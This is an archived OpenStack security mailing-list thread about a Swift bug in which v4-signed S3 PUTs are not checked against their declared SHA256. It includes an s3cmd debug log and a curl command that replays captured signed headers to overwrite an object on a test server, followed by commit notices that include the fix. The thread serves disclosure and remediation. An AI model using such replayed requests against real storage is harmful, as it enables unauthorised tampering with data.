a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1765834 at bugs.launchpad.net Thu Mar 28 21:12:53 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 28 Mar 2019 21:12:53 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155380757311.17795.6712589125243405944.malone@gac.canonical.com> Reviewed: https://review.openstack.org/648245 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=6afc1130fd753306d64745c9bee7712182b273d3 Submitter: Zuul Branch: feature/losf commit 89e5927f7dd94fc28b3847944eb7dd227d516fa8 Author: Thiago da Silva Date: Tue Mar 26 10:46:02 2019 -0400 Fix mocking time When running on Centos the side_effect was returning a MagicMock object instead of the intended int. Change-Id: I73713a9a96dc415073a637d85a40304021f76072 commit 50715acb1838fbde628e447e7b02545ce8469180 Author: OpenStack Release Bot Date: Mon Mar 25 17:07:54 2019 +0000 Update master for stable/stein Add file to the reno documentation build to show release notes for stable/stein. Use pbr instruction to increment the minor version number automatically so that master versions are higher than the versions on stable/stein. Change-Id: I6109bff3227f87d914abf7bd1d76143aaf91419d Sem-Ver: feature commit 179fa7ccd4d6faeacc989715887b69f9422a17b2 Author: John Dickinson Date: Mon Mar 18 17:09:31 2019 -0700 authors/changelog update for 2.21.0 release Change-Id: Iac51a69c71491e5a8db435aae396178a6c592c73 commit 64eec5fc93eb670e581cbb3a6dedb6a7aa501e99 Author: Tim Burke Date: Thu Mar 7 14:36:02 2019 -0800 Fix how we UTF-8-ify func tests I noticed while poking at the DLO func tests that we don't actually use non-ascii chars when we set up the test env. By patching the create name function earlier (in SetUpClass) we can ensure we get some more interesting characters in our object names. Change-Id: I9480ddf74463310aeb11ad876b79527888d8c871 commit fe3a20f2e4b745bf7d81f9bda97082b593e8794a Author: Tim Burke Date: Tue Mar 19 14:52:19 2019 -0700 Remove uncalled function Change-Id: Ica67815f0ddf4b00bce1ffe183735490c7f7c0b5 Related-Change: I5629de9f2e9b2331ed3f455d253efc69d030df72 commit adc568c97f5b30d9d4628eaf448f81d736ad4e51 Author: John Dickinson Date: Fri Mar 15 15:18:36 2019 -0700 Fix bulk responses when using xml and Expect 100-continue When we fixed bulk response heartbeating in https://review.openstack.org/#/c/510715/, code review raised the issue of moving the xml header down to after the early-exit clauses. At the time, it didn't seem to break anything, so it was left in place. However, that insight was correct. The purpose of the earlier patch was to force eventlet to use chunked transfer encoding on the response in order to prevent eventlet from buffering the whole response, thus defeating the purpose of the heartbeat responses. Moving the first line of the body lower (ie after the early exit checks), allows other headers in a chunked transfer encoding response to be appropriately processed before sending the headers. Sending the xml declaration early causes it to get intermingled in the 100-continue protocol, thus breaking the chunked transfer encoding semantics. Closes-Bug: #1819252 Change-Id: I072f4dab21cd7cdb81b9e41072eb504131411dc8 commit 585bf40cc0d8d88849dcf11d409e8c5a2a202a8d Author: Clay Gerrard Date: Mon Feb 18 20:05:46 2019 -0600 Simplify empty suffix handling We really only need to have one way to cleanup empty suffix dirs, and that's normally during suffix hashing which only happens when invalid suffixes get rehashed. When we iterate a suffix tree using yield hashes, we may discover an expired or otherwise reapable hashdir - when this happens we will now simply invalidate the suffix so that the next rehash can clean it up. This simplification removes an mis-behavior in the handling between the normal suffix rehashing cleanup and what was implemented in ssync. Change-Id: I5629de9f2e9b2331ed3f455d253efc69d030df72 Related-Change-Id: I2849a757519a30684646f3a6f4467c21e9281707 Closes-Bug: 1816501 commit e5eb673ccb5d3517107d28f6ce0672b066f53964 Author: Tim Burke Date: Fri Mar 1 14:00:35 2019 -0800 Stop monkey-patching mimetools You could *try* doing something similar to what we were doing there over in email.message for py3, but you would end up breaking pkg_resources (and therefor entrypoints) in the process. Drive-by: have mem_diskfile implement more of the diskfile API. Change-Id: I1ece4b4500ce37408799ee634ed6d7832fb7b721 commit d6af42b6b6d54713f09c3e1e983435bf2c3fa07d Author: Tim Burke Date: Tue Feb 19 13:53:07 2019 -0800 Clean up how we walk through ranges in ECAppIter Besides being easier to reason about, this also lets us run more unit tests under py37 which complains about a a generator raising StopIteration Change-Id: Ia6b945afef51bcc8ed20a7069fc60d5b8f9c9c0b commit c9773bfd2664f7090f590d288d9010d13851ea92 Author: Tim Burke Date: Wed Mar 13 16:20:00 2019 -0700 Add non-voting py37 unit test job Change-Id: I83f8f59023eabc97386481c18ed8bbf8fab64fa8 commit 95da1d97b11b43d04d20b98838ddc0c4f20cb6be Author: Tim Burke Date: Wed Mar 13 16:29:09 2019 -0700 Fix py35 unit test job Looks like some base templates got moved from xenial to bionic, which doesn't have py35. Explicitly say that this job needs xenial. Change-Id: I44df8736d0c33fc2c58c9be6b5b8023932f14a83 commit 53b56b65512fabc97890464c91faafdd0e3dbdaf Author: John Dickinson Date: Wed Mar 13 11:41:00 2019 -0700 crediting contributors to the un-landed hummingbird branch Change-Id: I51708cb2f0deca61b147589e062b520ac7a1807e commit fa678949ae310aa0499938fef788ec04409625d9 Author: Tim Burke Date: Wed May 30 11:43:40 2018 -0700 Fix quoting for large objects Change-Id: I46bdb6da8f778a6c86e0f8e883b52fc31e9fd44e Partial-Bug: 1774238 Closes-Bug: 1678022 Closes-Bug: 1598093 Closes-Bug: 1762997 commit a30a477755f669a11aef5ce492f287627565d978 Author: Kota Tsuyuzaki Date: Wed Feb 27 12:52:06 2019 +0900 Stop overwriting reserved term `dir` is a reserved instruction term in python, so this patch avoiding to assing a value to it. Change-Id: If780c4ffb72808b834e25a396665f17bd8383870 commit 74664af7ed761a729fbb9130e86ccff4070f0dcb Author: Michele Valsecchi Date: Tue Mar 12 13:56:27 2019 +0900 Fix a typo Replace 'o' with 'to'. Change-Id: I0a9b1547016b2662002c050e8388591d7d91ef97 commit 13e7f3641e3bffbcf89733ebb50d3ca6847105c6 Author: zhufl Date: Mon Mar 11 14:28:20 2019 +0800 Do not use self in classmethod cls should be used in classmethd, instead of self. Change-Id: I149b18935ce909ef978f2b7147b109e11c22f923 commit e1a12dc3dd04bc63d6b5b31d4ffd6a96bf8af918 Author: Clay Gerrard Date: Wed Mar 6 16:37:59 2019 -0800 Refactor write_affinity DELETE handling There's some code duplication we can drop, and some tests scenarios we can expand on. I don't believe there's any behavior change here. Change-Id: I2271d1cb757c989c4b0bfe228cd26c8620a151db commit d748851766309b7def5947025457de820219f9ec Author: Tim Burke Date: Tue Mar 5 14:50:22 2019 -0800 s3token: Add note about config change when upgrading from swift3 Change-Id: I2610cbdc9b7bc2b4d614eaedb4f3369d7a424ab3 commit d185b607bbdda8b47b0bb090f045a6b4ad8ed8b9 Author: Tim Burke Date: Mon Mar 4 17:37:09 2019 -0800 docs: clean up SAIO formatting Drive-by: use six.moves in s3api; fix "unexpected indent" warning when building docs on py3 Change-Id: I2a354e2624c763a68fcea7a6404e9c2fde30d631 commit 4ac81ebbd73784e0e1faf7c3e983b38ea4a66754 Author: Tim Burke Date: Fri Mar 1 13:04:58 2019 -0800 py3: fix copying unicode names Turns out, unquote()ing WSGI strings is a great way to mangle them. Change-Id: I42a08d84aa22a1a7ee7ccab97aaec55d845264f9 commit 5d4303edbf601c5ff692a378c11ed5da9aa407c9 Author: Tim Burke Date: Thu Feb 21 14:34:48 2019 -0800 manage-shard-ranges: nicer message if we can't get_info() Tracebacks are ugly. Change-Id: I09b907608127e4c633b554be2926245b35402dbf commit 61e6ac0ebddc630390dfbe1292cd392c57f0ca07 Author: Pete Zaitcev Date: Tue Feb 26 23:06:52 2019 -0600 py3: port formpost middleware Change-Id: I8f3d4d5f6976ef5b63facd9b5723aac894066b74 commit baf18edc00851f6749a40794587ca14a52135bf3 Author: Tim Burke Date: Thu Oct 18 10:35:31 2018 -0700 Clean up account-reaper a bit - Drop the (partial) logging translation - Save our log concatenations until the end - Stop encoding object names; direct_client is happy to take Unicode - Remove a couple loop breaks that were only used by tests Change-Id: I4a4f301a7a6cb0f217ca0bf8712ee0291bbc14a3 Partial-Bug: #1674543 commit 9b3ca9423eb8cf9420a3e98f60cd56dd281b4208 Author: Simeon Gourlin Date: Tue Jan 29 09:13:16 2019 +0100 Fix decryption for broken objects Try to get decryption object key from stored metadata (key_id path from X-Object-Sysmeta-Crypto-Body-Meta) because sometime object.path is wrong during encryption process. This patch doesn't solve the underlying issue, but is needed to decrypt already wrongly stored objects. Change-Id: I1a6bcdebdb46ef03c342428aeed73ae76db29922 Co-Author: Thomas Goirand Partial-Bug: #1813725 commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 Closes-Bug: 1765834 commit 37693a4e1523fc61d653e231e57d33b37464c2b5 Author: Tim Burke Date: Thu Dec 27 22:34:05 2018 +0000 Run ceph-s3-tests job less We don't need it for unit-test-only changes or most doc changes. 